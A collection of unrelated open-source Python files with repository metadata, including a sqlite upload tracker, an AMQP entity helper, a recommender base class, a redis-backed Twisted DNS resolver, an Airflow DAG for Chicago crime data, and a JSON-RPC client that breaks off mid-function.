class DB(object):
def __init__(self, db_path):
self.db_path = db_path
self.trans_conn = None
self.versions = [self.version_1, self.version_2]
try:
conn = self.get_conn()
version = int(conn.execute('select value from settings where key=?',
('version',)).fetchone()[0])
except sqlite3.OperationalError:
conn.close()
os.remove(self.db_path)
version = 0
for upgrade_version in self.versions[version:]:
upgrade_version()
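    # To add a schema change (illustrative pattern): define a version_3
    # method below and append it to self.versions above; a fresh database
    # then runs every step, while an existing one only runs the steps past
    # its stored version number.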
def get_conn(self):
if self.trans_conn:
return self.trans_conn
return sqlite3.connect(self.db_path)
def version_1(self):
conn = self.get_conn()
c = conn.cursor()
c.execute('create table settings (key text, value text)')
c.execute('create table upload_dirs (dir text)')
c.execute('''create table files
(filename text, puid text, uploaded int)''')
c.execute('create table files_skipped (filename text)')
c.execute('insert into settings (key, value) values (?, ?)',
('version', '1'))
if get_library_file:
upload_src = 'itunes'
else:
upload_src = 'folder'
c.execute('insert into settings (key, value) values (?, ?)',
('upload_src', upload_src))
c.execute('insert into upload_dirs values (?)', (get_default_path(),))
conn.commit()
def version_2(self):
conn = self.get_conn()
c = conn.cursor()
c.execute('create index files_filename on files (filename)')
c.execute("""update settings set value=? where key='version'""", (2,))
conn.commit()
def add_skipped(self, filename):
conn = self.get_conn()
conn.execute('insert into files_skipped values(?)', (filename,))
conn.commit()
def is_file_uploaded(self, filename):
c = self.get_conn()
return c.execute(
'''select filename from files where
filename=? and uploaded=? union
select filename from files_skipped where filename=?''',
(filename, 1, filename)).fetchone() != None
def total_uploaded_tracks(self):
c = self.get_conn()
return c.execute('select count(*) from files where uploaded=?',
(1,)).fetchone()[0]
def get_tracks(self):
if self.upload_src == 'itunes':
tracks = filter(is_music_file,
ITunes().get_all_track_filenames())
else:
tracks = []
for dir in unique_dirs(self.upload_dirs):
tracks.extend(get_music_files(dir))
if tracks == []:
return None
else:
return filter(lambda x: not self.is_file_uploaded(x), tracks)
def get_upload_src(self):
c = self.get_conn()
return c.execute('select value from settings where key=?',
('upload_src',)).fetchone()[0]
def set_upload_src(self, value):
conn = self.get_conn()
if value not in ['itunes', 'folder']:
raise Exception('Invalid upload src')
conn.execute('update settings set value=? where key=?',
(value,'upload_src'))
conn.commit()
upload_src = property(get_upload_src, set_upload_src)
def set_upload_dirs(self, values):
conn = self.get_conn()
data = [(val,) for val in values]
c = conn.cursor()
c.execute('delete from upload_dirs')
c.executemany('insert into upload_dirs values (?)', data)
conn.commit()
def get_upload_dirs(self):
c = self.get_conn()
values = c.execute('select dir from upload_dirs').fetchall()
return [val[0] for val in values]
upload_dirs = property(get_upload_dirs, set_upload_dirs)
def get_puid(self, filename):
c = self.get_conn()
res = c.execute('select puid from files where filename=?',
(filename,)).fetchone()
if res == None:
return None
else:
return res[0]
def file_exists(self, filename, conn):
return (conn.execute('select count(*) from files where filename=?',
(filename,)).fetchone()[0] > 0)
def set_puid(self, filename, puid):
conn = self.get_conn()
if self.file_exists(filename, conn):
conn.execute('update files set puid=? where filename=?',
(puid, filename))
else:
conn.execute('''insert into files (filename, puid, uploaded) values
(?, ?, ?)''', (filename, puid, 0))
conn.commit()
def set_uploaded(self, filename, puid=None):
conn = self.get_conn()
if self.file_exists(filename, conn):
conn.execute('update files set uploaded=? where filename=?',
(1, filename))
else:
conn.execute('''insert into files (filename, puid, uploaded) values
(?, ?, ?)''', (filename, puid, 1))
if not self.trans_conn:
conn.commit()
def start_trans(self):
self.trans_conn = self.get_conn()
def end_trans(self):
self.trans_conn.commit()
self.trans_conn = None
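# Illustrative batching pattern (assumed usage): wrap many uploads in one
# commit via the transaction helpers above.
#
#     db.start_trans()
#     for name in filenames:
#         db.set_uploaded(name)
#     db.end_trans()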
db = DB(get_db_path())
def use_new_db(path):
global db
db = DB(path)
|
{
"content_hash": "283e90e4714fd637b2bbf2758349b24c",
"timestamp": "",
"source": "github",
"line_count": 202,
"max_line_length": 72,
"avg_line_length": 27.178217821782177,
"alnum_prop": 0.654280510018215,
"repo_name": "JustinTulloss/harmonize.fm",
"id": "047fff0a77e0a8575c7861b44611ddf70767f401",
"size": "5490",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "uploader/db.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "ASP",
"bytes": "93"
},
{
"name": "ActionScript",
"bytes": "11412"
},
{
"name": "C",
"bytes": "24324"
},
{
"name": "C++",
"bytes": "9745"
},
{
"name": "JavaScript",
"bytes": "5472452"
},
{
"name": "PHP",
"bytes": "14520"
},
{
"name": "Python",
"bytes": "1094604"
},
{
"name": "Ruby",
"bytes": "510"
},
{
"name": "Visual Basic",
"bytes": "1724"
}
],
"symlink_target": ""
}
|
"""
AMQP Management Entity
"""
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import itertools, re
import sys
if sys.version_info[0] > 2:
# Python 3 does not have a unicode() builtin method,
# luckily all strings are unicode to start with
def unicode(s):
return s
def dict_iteritems(d):
return iter(d.items())
else:
def dict_iteritems(d):
return d.iteritems()
def clean_dict(items, **kwargs):
"""
@param items: A mapping or iterable of pairs.
@return: dict containing items + kwargs without any None values. All keys are unicode.
"""
if isinstance(items, dict): items = dict_iteritems(items)
return dict((unicode(k), v) for k, v in itertools.chain(items,
dict_iteritems(kwargs))
if v is not None)
class EntityBase(object):
"""
A collection of named attributes.
Attribute access:
- via index operator: entity['foo']
    - as python attributes: entity.foo (only if attribute name is a legal python identifier
after replacing '-' with '_')
@ivar attributes: Map of attribute values for this entity.
NOTE: EntityBase does not itself implement the python map protocol because map
methods (in particular 'update') can clash with AMQP methods and attributes.
"""
def __init__(self, attributes=None, **kwargs):
self.__dict__['attributes'] = {}
if attributes:
for k, v in dict_iteritems(attributes):
self.attributes[k] = v
self.__dict__[self._pyname(k)] = v
for k, v in dict_iteritems(kwargs):
self._set(k, v)
def __getitem__(self, name):
return self.attributes[name]
def __getattr__(self, name):
if name in self.attributes:
return self.attributes[name]
raise AttributeError
def __contains__(self, name):
return name in self.attributes
@staticmethod
def _pyname(name): return name.replace('-', '_')
def _set(self, name, value):
"""Subclasses can override _set to do validation on each change"""
self.attributes[name] = value
self.__dict__[self._pyname(name)] = value
# Access using []
def __setitem__(self, name, value): self._set(name, value)
def __delitem__(self, name):
del self.attributes[name]
del self.__dict__[self._pyname(name)]
# Access as python attribute.
def __setattr__(self, name, value): self._set(name, value)
def __delattr__(self, name):
self.__delitem__(name)
def __repr__(self): return "EntityBase(%r)" % self.attributes
# attributes name, identity and type are special snowflake
# attributes that we print before all the not so special
# attributes. Assign each a priority for the sort
_SPECIAL = {u"name": 0, u"identity": 1, u"type": 2}
def __str__(self):
# Sort so the _SPECIAL attributes are printed first, 3 ==
# lower priority than special
keys = sorted(self.attributes.keys(),
key=lambda k: self._SPECIAL.get(k, 3))
return "Entity(%s)" % ", ".join("%s=%s" % (k, self.attributes[k]) for k in keys)
def update(entity, values):
"""Update entity from values
@param entity: an Entity
@param values: a map of values
"""
for k, v in dict_iteritems(values): entity[k] = v
SEPARATOR_RE = re.compile(r' |_|-|\.')
def camelcase(str, capital=False):
"""Convert string str with ' ', '_', '.' or '-' separators to camelCase."""
if not str: return ''
words = SEPARATOR_RE.split(str)
first = words[0]
if capital: first = first[0].upper() + first[1:]
return first + ''.join([w.capitalize() for w in words[1:]])
CAPS_RE = re.compile('[A-Z]')
def uncamelcase(str, separator='_'):
"""Convert camelCase string str to string with separator, e.g. camel_case"""
if len(str) == 0: return str
return str[0] + CAPS_RE.sub(lambda m: separator+m.group(0).lower(), str[1:])
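# Round-trip examples (illustrative):
#
#     camelcase('max-frame-size')                 # 'maxFrameSize'
#     camelcase('max-frame-size', capital=True)   # 'MaxFrameSize'
#     uncamelcase('maxFrameSize', separator='-')  # 'max-frame-size'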
|
{
"content_hash": "72166a3761d3b3450058bcdd6949fb7e",
"timestamp": "",
"source": "github",
"line_count": 130,
"max_line_length": 92,
"avg_line_length": 31.8,
"alnum_prop": 0.6088534107402032,
"repo_name": "irinabov/debian-qpid-dispatch",
"id": "a7d703a2427e54101d288f3f54a04a9c8a1a4fdf",
"size": "4923",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/qpid_dispatch/management/entity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "1954231"
},
{
"name": "C++",
"bytes": "58231"
},
{
"name": "CMake",
"bytes": "42570"
},
{
"name": "CSS",
"bytes": "24393"
},
{
"name": "Dockerfile",
"bytes": "3278"
},
{
"name": "HTML",
"bytes": "2320"
},
{
"name": "JavaScript",
"bytes": "719793"
},
{
"name": "Python",
"bytes": "2115168"
},
{
"name": "Shell",
"bytes": "34107"
}
],
"symlink_target": ""
}
|
"""
The :mod:`surprise.prediction_algorithms.algo_base` module defines the base
class :class:`AlgoBase` from which every single prediction algorithm has to
inherit.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from .. import similarities as sims
from .predictions import PredictionImpossible
from .predictions import Prediction
from .optimize_baselines import baseline_als
from .optimize_baselines import baseline_sgd
class AlgoBase:
"""Abstract class where is defined the basic behavior of a prediction
algorithm.
Keyword Args:
baseline_options(dict, optional): If the algorithm needs to compute a
baseline estimate, the ``baseline_options`` parameter is used to
configure how they are computed. See
:ref:`baseline_estimates_configuration` for usage.
"""
def __init__(self, **kwargs):
self.bsl_options = kwargs.get('bsl_options', {})
self.sim_options = kwargs.get('sim_options', {})
if 'user_based' not in self.sim_options:
self.sim_options['user_based'] = True
def train(self, trainset):
"""Train an algorithm on a given training set.
This method is called by every derived class as the first basic step
for training an algorithm. It basically just initializes some internal
structures and set the self.trainset attribute.
Args:
trainset(:obj:`Trainset <surprise.dataset.Trainset>`) : A training
set, as returned by the :meth:`folds
<surprise.dataset.Dataset.folds>` method.
"""
self.trainset = trainset
# (re) Initialise baselines
self.bu = self.bi = None
def predict(self, uid, iid, r_ui=None, clip=True, verbose=False):
"""Compute the rating prediction for given user and item.
The ``predict`` method converts raw ids to inner ids and then calls the
``estimate`` method which is defined in every derived class. If the
prediction is impossible (for whatever reason), the prediction is set
to the global mean of all ratings.
Args:
uid: (Raw) id of the user. See :ref:`this note<raw_inner_note>`.
iid: (Raw) id of the item. See :ref:`this note<raw_inner_note>`.
r_ui(float): The true rating :math:`r_{ui}`. Optional, default is
``None``.
clip(bool): Whether to clip the estimation into the rating scale.
For example, if :math:`\\hat{r}_{ui}` is :math:`5.5` while the
rating scale is :math:`[1, 5]`, then :math:`\\hat{r}_{ui}` is
set to :math:`5`. Same goes if :math:`\\hat{r}_{ui} < 1`.
Default is ``True``.
verbose(bool): Whether to print details of the prediction. Default
is False.
Returns:
A :obj:`Prediction\
<surprise.prediction_algorithms.predictions.Prediction>` object
containing:
- The (raw) user id ``uid``.
- The (raw) item id ``iid``.
            - The true rating ``r_ui`` (:math:`r_{ui}`).
- The estimated rating (:math:`\\hat{r}_{ui}`).
- Some additional details about the prediction that might be useful
for later analysis.
"""
# Convert raw ids to inner ids
try:
iuid = self.trainset.to_inner_uid(uid)
except ValueError:
iuid = 'UKN__' + str(uid)
try:
iiid = self.trainset.to_inner_iid(iid)
except ValueError:
iiid = 'UKN__' + str(iid)
details = {}
try:
est = self.estimate(iuid, iiid)
# If the details dict was also returned
if isinstance(est, tuple):
est, details = est
details['was_impossible'] = False
except PredictionImpossible as e:
est = self.trainset.global_mean
details['was_impossible'] = True
details['reason'] = str(e)
# Remap the rating into its initial rating scale (because the rating
# scale was translated so that ratings are all >= 1)
est -= self.trainset.offset
# clip estimate into [lower_bound, higher_bound]
if clip:
lower_bound, higher_bound = self.trainset.rating_scale
est = min(higher_bound, est)
est = max(lower_bound, est)
pred = Prediction(uid, iid, r_ui, est, details)
if verbose:
print(pred)
return pred
def test(self, testset, verbose=False):
"""Test the algorithm on given testset, i.e. estimate all the ratings
in the given testset.
Args:
testset: A test set, as returned by the :meth:`folds()
<surprise.dataset.Dataset.folds>` method or by the
:meth:`build_testset()
<surprise.dataset.Trainset.build_testset>` method.
verbose(bool): Whether to print details for each predictions.
Default is False.
Returns:
A list of :class:`Prediction\
<surprise.prediction_algorithms.predictions.Prediction>` objects
that contains all the estimated ratings.
"""
# The ratings are translated back to their original scale.
predictions = [self.predict(uid,
iid,
r_ui_trans - self.trainset.offset,
verbose=verbose)
for (uid, iid, r_ui_trans) in testset]
return predictions
def compute_baselines(self):
"""Compute users and items baselines.
The way baselines are computed depends on the ``bsl_options`` parameter
passed at the creation of the algorithm (see
:ref:`baseline_estimates_configuration`).
This method is only relevant for algorithms using :func:`Pearson
        baseline similarity<surprise.similarities.pearson_baseline>` or the
:class:`BaselineOnly
<surprise.prediction_algorithms.baseline_only.BaselineOnly>` algorithm.
Returns:
A tuple ``(bu, bi)``, which are users and items baselines."""
        # First off, if this method has already been called before on the same
        # trainset, then just return. Indeed, compute_baselines may be called
        # more than once, for example when a similarity metric (e.g.
        # pearson_baseline) uses baseline estimates.
if self.bu is not None:
return self.bu, self.bi
method = dict(als=baseline_als,
sgd=baseline_sgd)
method_name = self.bsl_options.get('method', 'als')
try:
print('Estimating biases using', method_name + '...')
self.bu, self.bi = method[method_name](self)
return self.bu, self.bi
except KeyError:
raise ValueError('Invalid method ' + method_name +
' for baseline computation.' +
' Available methods are als and sgd.')
def compute_similarities(self):
"""Build the similarity matrix.
The way the similarity matrix is computed depends on the
``sim_options`` parameter passed at the creation of the algorithm (see
:ref:`similarity_measures_configuration`).
This method is only relevant for algorithms using a similarity measure,
such as the :ref:`k-NN algorithms <pred_package_knn_inpired>`.
Returns:
The similarity matrix."""
construction_func = {'cosine': sims.cosine,
'msd': sims.msd,
'pearson': sims.pearson,
'pearson_baseline': sims.pearson_baseline}
if self.sim_options['user_based']:
n_x, yr = self.trainset.n_users, self.trainset.ir
else:
n_x, yr = self.trainset.n_items, self.trainset.ur
min_support = self.sim_options.get('min_support', 1)
args = [n_x, yr, min_support]
name = self.sim_options.get('name', 'msd').lower()
if name == 'pearson_baseline':
shrinkage = self.sim_options.get('shrinkage', 100)
bu, bi = self.compute_baselines()
if self.sim_options['user_based']:
bx, by = bu, bi
else:
bx, by = bi, bu
args += [self.trainset.global_mean, bx, by, shrinkage]
try:
print('Computing the {0} similarity matrix...'.format(name))
sim = construction_func[name](*args)
print('Done computing similarity matrix.')
return sim
except KeyError:
raise NameError('Wrong sim name ' + name + '. Allowed values ' +
'are ' + ', '.join(construction_func.keys()) + '.')
def get_neighbors(self, iid, k):
"""Return the ``k`` nearest neighbors of ``iid``, which is the inner id
of a user or an item, depending on the ``user_based`` field of
``sim_options`` (see :ref:`similarity_measures_configuration`).
As the similarities are computed on the basis of a similarity measure,
this method is only relevant for algorithms using a similarity measure,
such as the :ref:`k-NN algorithms <pred_package_knn_inpired>`.
For a usage example, see the :ref:`FAQ <get_k_nearest_neighbors>`.
Args:
iid(int): The (inner) id of the user (or item) for which we want
the nearest neighbors. See :ref:`this note<raw_inner_note>`.
k(int): The number of neighbors to retrieve.
Returns:
The list of the ``k`` (inner) ids of the closest users (or items)
to ``iid``.
"""
if self.sim_options['user_based']:
all_instances = self.trainset.all_users
else:
all_instances = self.trainset.all_items
others = [(x, self.sim[iid, x]) for x in all_instances() if x != iid]
others.sort(key=lambda tple: tple[1], reverse=True)
k_nearest_neighbors = [j for (j, _) in others[:k]]
return k_nearest_neighbors
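# Illustrative end-to-end sketch (assumed setup; KNNBasic is one of the k-NN
# algorithms deriving from AlgoBase):
#
#     algo = KNNBasic(sim_options={'name': 'pearson_baseline',
#                                  'user_based': True})
#     algo.train(trainset)   # k-NN algorithms also build the similarity matrix
#     pred = algo.predict(uid='196', iid='302', r_ui=4, verbose=True)
#     inner_uid = algo.trainset.to_inner_uid('196')
#     neighbors = algo.get_neighbors(inner_uid, k=5)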
|
{
"content_hash": "786201f054be95280544b2d2a5db1b5b",
"timestamp": "",
"source": "github",
"line_count": 269,
"max_line_length": 79,
"avg_line_length": 38.342007434944236,
"alnum_prop": 0.5782431646305992,
"repo_name": "charmoniumQ/Surprise",
"id": "8f88186404663f0331392a95bc18d7c6597fa44b",
"size": "10314",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "surprise/prediction_algorithms/algo_base.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "177820"
}
],
"symlink_target": ""
}
|
from distutils.core import setup, Extension
import os
ROOT = os.path.dirname(__file__)
module1 = Extension(
'prefixtrie',
include_dirs = [
os.path.join(ROOT, os.pardir, os.pardir, "C++", "prefixtrie"),
],
sources = ['prefixtrie.cpp'],
extra_compile_args = ['-std=c++11', '-g']
)
setup(
name = 'prefixtrie',
author = "Aaron France",
author_email = "aaron.l.france@gmail.com",
version = '0.1',
description = "Prefix Trie",
long_description = "Prefix Trie. Written in C++11.",
ext_modules = [module1]
)
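# Typical commands for building this extension (assuming a C++11-capable
# compiler and the include path laid out above):
#
#     python setup.py build_ext --inplace   # build prefixtrie in place
#     python setup.py install               # or install it system-wide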
|
{
"content_hash": "d59f72411392ed8e9f18e5b725014d3f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 70,
"avg_line_length": 24.82608695652174,
"alnum_prop": 0.5919439579684763,
"repo_name": "AeroNotix/algostructure",
"id": "8ecf1c1e8f4b642a0c2b2cb9925faf23b121b874",
"size": "571",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "CPython/prefixtrie/setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "2244"
},
{
"name": "C++",
"bytes": "24982"
},
{
"name": "Clojure",
"bytes": "447"
},
{
"name": "Common Lisp",
"bytes": "2897"
},
{
"name": "D",
"bytes": "711"
},
{
"name": "Erlang",
"bytes": "11990"
},
{
"name": "Go",
"bytes": "10886"
},
{
"name": "Haskell",
"bytes": "969"
},
{
"name": "Java",
"bytes": "4504"
},
{
"name": "Makefile",
"bytes": "5363"
},
{
"name": "OCaml",
"bytes": "774"
},
{
"name": "Python",
"bytes": "9412"
},
{
"name": "Racket",
"bytes": "1575"
},
{
"name": "Scala",
"bytes": "1182"
}
],
"symlink_target": ""
}
|
"""
** OBS This module is not yet used by Evennia **
Example module holding functions for out-of-band protocols to
import and map to given commands from the client. This module
is selected by settings.OOB_FUNC_MODULE.
All functions defined global in this module will be available
for the oob system to call. They will be called with a session/character
as first argument (depending on if the session is logged in or not),
following by any number of extra arguments. The return value will
be packed and returned to the oob protocol and can be on any form.
"""
def testoob(character, *args, **kwargs):
"Simple test function"
# take the first positional argument as the test value (the original code
# referenced an undefined 'val')
val = args[0] if args else ""
print "Called testoob: %s" % val
return "testoob did stuff to the input string '%s'!" % val
# MSDP_REPORTABLE is a standard suggestion for making it easy to create generic
# GUIs. It maps MSDP command names to Evennia commands found in OOB_FUNC_MODULE.
# It is up to these commands to return data in the proper form.
MSDP_REPORTABLE = {
# General
"CHARACTER_NAME": "get_character_name",
"SERVER_ID": "get_server_id",
"SERVER_TIME": "get_server_time",
# Character
"AFFECTS": "char_affects",
"ALIGNMENT": "char_alignment",
"EXPERIENCE": "char_experience",
"EXPERIENCE_MAX": "char_experience_max",
"EXPERIENCE_TNL": "char_experience_tnl",
"HEALTH": "char_health",
"HEALTH_MAX": "char_health_max",
"LEVEL": "char_level",
"RACE": "char_race",
"CLASS": "char_class",
"MANA": "char_mana",
"MANA_MAX": "char_mana_max",
"WIMPY": "char_wimpy",
"PRACTICE": "char_practice",
"MONEY": "char_money",
"MOVEMENT": "char_movement",
"MOVEMENT_MAX": "char_movement_max",
"HITROLL": "char_hitroll",
"DAMROLL": "char_damroll",
"AC": "char_ac",
"STR": "char_str",
"INT": "char_int",
"WIS": "char_wis",
"DEX": "char_dex",
"CON": "char_con",
# Combat
"OPPONENT_HEALTH": "opponent_health",
"OPPONENT_HEALTH_MAX":"opponent_health_max",
"OPPONENT_LEVEL": "opponent_level",
"OPPONENT_NAME": "opponent_name",
# World
"AREA_NAME": "area_name",
"ROOM_EXITS": "area_room_exits",
"ROOM_NAME": "room_name",
"ROOM_VNUM": "room_dbref",
"WORLD_TIME": "world_time",
# Configurable variables
"CLIENT_ID": "client_id",
"CLIENT_VERSION": "client_version",
"PLUGIN_ID": "plugin_id",
"ANSI_COLORS": "ansi_colours",
"XTERM_256_COLORS": "xterm_256_colors",
"UTF_8": "utf_8",
"SOUND": "sound",
"MXP": "mxp",
# GUI variables
"BUTTON_1": "button1",
"BUTTON_2": "button2",
"BUTTON_3": "button3",
"BUTTON_4": "button4",
"BUTTON_5": "button5",
"GAUGE_1": "gauge1",
"GAUGE_2": "gauge2",
"GAUGE_3": "gauge3",
"GAUGE_4": "gauge4",
"GAUGE_5": "gauge5"}
|
{
"content_hash": "dfc51db0b6f6c4dea04487d4ffff77de",
"timestamp": "",
"source": "github",
"line_count": 93,
"max_line_length": 79,
"avg_line_length": 29.978494623655912,
"alnum_prop": 0.6255380200860832,
"repo_name": "TaliesinSkye/evennia",
"id": "ab3ca66e9bf8ac9dd92b222bf40c1973dd86c7bc",
"size": "2788",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "wintersoasis-master/conf/examples/oobfuncs.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "59698"
},
{
"name": "D",
"bytes": "9343933"
},
{
"name": "Emacs Lisp",
"bytes": "2734"
},
{
"name": "JavaScript",
"bytes": "91190"
},
{
"name": "Python",
"bytes": "2840755"
},
{
"name": "Shell",
"bytes": "4577"
}
],
"symlink_target": ""
}
|
"""
Script to cache anonymous houseprint data into new_houseprint.pkl
Created on 05/07/2014 by Roel De Coninck
"""
import os, sys
import inspect
script_dir = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
# add the path to opengrid to sys.path
sys.path.append(os.path.join(script_dir, os.pardir, os.pardir))
from opengrid.library import config
from opengrid.library.houseprint import houseprint
##############################################################################
c = config.Config()
gjson = c.get('houseprint','json')
hp = houseprint.Houseprint(gjson)
print('Sensor data fetched')
hp.save('new_houseprint.pkl')
|
{
"content_hash": "b6249498b74927a9f211643888f022c8",
"timestamp": "",
"source": "github",
"line_count": 26,
"max_line_length": 86,
"avg_line_length": 26.26923076923077,
"alnum_prop": 0.6412884333821376,
"repo_name": "MatteusDeloge/opengrid",
"id": "fca7be3147e819ac38c9b6e1925f4860505ecd65",
"size": "708",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "notebooks/cache_anonymous_houseprint.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "243319"
},
{
"name": "Jupyter Notebook",
"bytes": "104480"
},
{
"name": "Python",
"bytes": "173204"
},
{
"name": "Shell",
"bytes": "308"
}
],
"symlink_target": ""
}
|
from twisted.names import dns, server, client, cache
from twisted.application import service, internet
from twisted.internet import defer
from twisted.python import log
import txredisapi
class RedisResolverBackend(client.Resolver):
def __init__(self, redis, servers=None):
self.redis = redis
client.Resolver.__init__(self, servers=servers)
self.ttl = 5
@defer.inlineCallbacks
def _get_ip_addr(self, hostname, timeout):
ip = yield self.redis.get(hostname)
log.msg('redis: %s' % ip)
if ip:
defer.returnValue([(dns.RRHeader(hostname, dns.A, dns.IN, self.ttl, dns.Record_A(ip, self.ttl)),), (), ()])
else:
i = yield self._lookup(hostname, dns.IN, dns.A, timeout)
defer.returnValue(i)
def lookupAddress(self, name, timeout = None):
return self._get_ip_addr(name, timeout)
def create_application():
rd = txredisapi.lazyConnectionPool()
redisBackend = RedisResolverBackend(rd, servers=[('8.8.8.8', 53)])
application = service.Application("txdnsredis")
srv_collection = service.IServiceCollection(application)
dnsFactory = server.DNSServerFactory(caches=[cache.CacheResolver()], clients=[redisBackend])
internet.TCPServer(53, dnsFactory).setServiceParent(srv_collection)
internet.UDPServer(53, dns.DNSDatagramProtocol(dnsFactory)).setServiceParent(srv_collection)
return application
# .tac app
application = create_application()
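# To run this as a Twisted application file (assumes a local redis server,
# reachable upstream DNS, and permission to bind port 53):
#
#     twistd -ny txredns.tac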
|
{
"content_hash": "42105212c8cbb71f5eab7190db20c2ef",
"timestamp": "",
"source": "github",
"line_count": 41,
"max_line_length": 119,
"avg_line_length": 36.41463414634146,
"alnum_prop": 0.6878767582049564,
"repo_name": "nbari/my-sandbox",
"id": "2b8e8548f7134780033fa448d0cf4e9ffbd5a53d",
"size": "1812",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "python/DNS/txredns.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "5321"
},
{
"name": "HTML",
"bytes": "53098"
},
{
"name": "PHP",
"bytes": "5266"
},
{
"name": "Python",
"bytes": "240689"
},
{
"name": "Shell",
"bytes": "5076"
}
],
"symlink_target": ""
}
|
from airflow import DAG
from airflow.providers.google.cloud.operators import kubernetes_engine
from airflow.providers.google.cloud.transfers import gcs_to_bigquery
default_args = {
"owner": "Google",
"depends_on_past": False,
"start_date": "2021-03-01",
}
with DAG(
dag_id="chicago_crime.crime",
default_args=default_args,
max_active_runs=1,
schedule_interval="@daily",
catchup=False,
default_view="graph",
) as dag:
create_cluster = kubernetes_engine.GKECreateClusterOperator(
task_id="create_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
body={
"name": "chicago-crime--crime",
"initial_node_count": 1,
"network": "{{ var.value.vpc_network }}",
"node_config": {
"machine_type": "e2-standard-2",
"oauth_scopes": [
"https://www.googleapis.com/auth/devstorage.read_write",
"https://www.googleapis.com/auth/cloud-platform",
],
},
},
)
# Run CSV transform within kubernetes pod
chicago_crime_transform_csv = kubernetes_engine.GKEStartPodOperator(
task_id="chicago_crime_transform_csv",
startup_timeout_seconds=600,
name="crime",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
cluster_name="chicago-crime--crime",
namespace="default",
image_pull_policy="Always",
image="{{ var.json.chicago_crime.container_registry.run_csv_transform_kub }}",
env_vars={
"SOURCE_URL": "https://data.cityofchicago.org/api/views/ijzp-q8t2/rows.csv",
"SOURCE_FILE": "files/data.csv",
"TARGET_FILE": "files/data_output.csv",
"TARGET_GCS_BUCKET": "{{ var.value.composer_bucket }}",
"TARGET_GCS_PATH": "data/chicago_crime/crime/data_output.csv",
"CHUNK_SIZE": "1000000",
},
)
# Task to load CSV data to a BigQuery table
load_chicago_crime_to_bq = gcs_to_bigquery.GCSToBigQueryOperator(
task_id="load_chicago_crime_to_bq",
bucket="{{ var.value.composer_bucket }}",
source_objects=["data/chicago_crime/crime/data_output.csv"],
source_format="CSV",
destination_project_dataset_table="chicago_crime.crime",
skip_leading_rows=1,
write_disposition="WRITE_TRUNCATE",
schema_fields=[
{"name": "unique_key", "type": "integer", "mode": "required"},
{"name": "case_number", "type": "string", "mode": "nullable"},
{"name": "date", "type": "timestamp", "mode": "nullable"},
{"name": "block", "type": "string", "mode": "nullable"},
{"name": "iucr", "type": "string", "mode": "nullable"},
{"name": "primary_type", "type": "string", "mode": "nullable"},
{"name": "description", "type": "string", "mode": "nullable"},
{"name": "location_description", "type": "string", "mode": "nullable"},
{"name": "arrest", "type": "boolean", "mode": "nullable"},
{"name": "domestic", "type": "boolean", "mode": "nullable"},
{"name": "beat", "type": "integer", "mode": "nullable"},
{"name": "district", "type": "integer", "mode": "nullable"},
{"name": "ward", "type": "integer", "mode": "nullable"},
{"name": "community_area", "type": "integer", "mode": "nullable"},
{"name": "fbi_code", "type": "string", "mode": "nullable"},
{"name": "x_coordinate", "type": "float", "mode": "nullable"},
{"name": "y_coordinate", "type": "float", "mode": "nullable"},
{"name": "year", "type": "integer"},
{"name": "updated_on", "type": "timestamp", "mode": "nullable"},
{"name": "latitude", "type": "float", "mode": "nullable"},
{"name": "longitude", "type": "float", "mode": "nullable"},
{"name": "location", "type": "string", "mode": "nullable"},
],
)
delete_cluster = kubernetes_engine.GKEDeleteClusterOperator(
task_id="delete_cluster",
project_id="{{ var.value.gcp_project }}",
location="us-central1-c",
name="chicago-crime--crime",
)
(
create_cluster
>> chicago_crime_transform_csv
>> load_chicago_crime_to_bq
>> delete_cluster
)
|
{
"content_hash": "01e93a8ba950444514f4358cb6d40868",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 88,
"avg_line_length": 42.39047619047619,
"alnum_prop": 0.5472927432037744,
"repo_name": "GoogleCloudPlatform/public-datasets-pipelines",
"id": "1378546471c61d3e13ad60b309dd693fab117d3e",
"size": "5028",
"binary": false,
"copies": "2",
"ref": "refs/heads/main",
"path": "datasets/chicago_crime/pipelines/crime/crime_dag.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "101888"
},
{
"name": "HCL",
"bytes": "678082"
},
{
"name": "Jinja",
"bytes": "12539"
},
{
"name": "Jupyter Notebook",
"bytes": "655592"
},
{
"name": "Python",
"bytes": "4784376"
}
],
"symlink_target": ""
}
|
import sys
import urllib2
import base64
import BaseHTTPServer
import SocketServer
import httplib
import urllib
import urlparse
from StringIO import StringIO
import gzip
import rpcrequest
import rpcresponse
import rpcerror
import rpclib
from rpcjson import json
def http_request(url, json_string, username = None, password = None):
"""
Fetch data from a webserver (POST request)
:param url: URL of the JSON-RPC handler
:param json_string: JSON string with the request payload
:param username: If *username* is given, HTTP Basic authentication will be used.
"""
request = urllib2.Request(url, data = json_string)
request.add_header("Content-Type", "application/json")
request.add_header("Content-Length", len(json_string))
if username:
base64string = base64.encodestring('%s:%s' % (username, password))[:-1]
request.add_header("Authorization", "Basic %s" % base64string)
# enable gzip content
request.add_header('Accept-encoding', 'gzip')
response = urllib2.urlopen(request)
if response.info().get('Content-Encoding') == 'gzip':
buf = StringIO( response.read() )
f = gzip.GzipFile(fileobj=buf)
response_string = f.read()
